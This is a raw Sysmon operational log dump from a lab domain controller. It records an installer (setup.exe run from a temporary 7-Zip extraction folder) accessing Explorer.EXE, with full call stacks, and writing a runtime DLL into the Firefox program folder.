l+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-math-l1-1-0.dll2021-01-18 13:59:52.192 10341000x800000000000000014417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
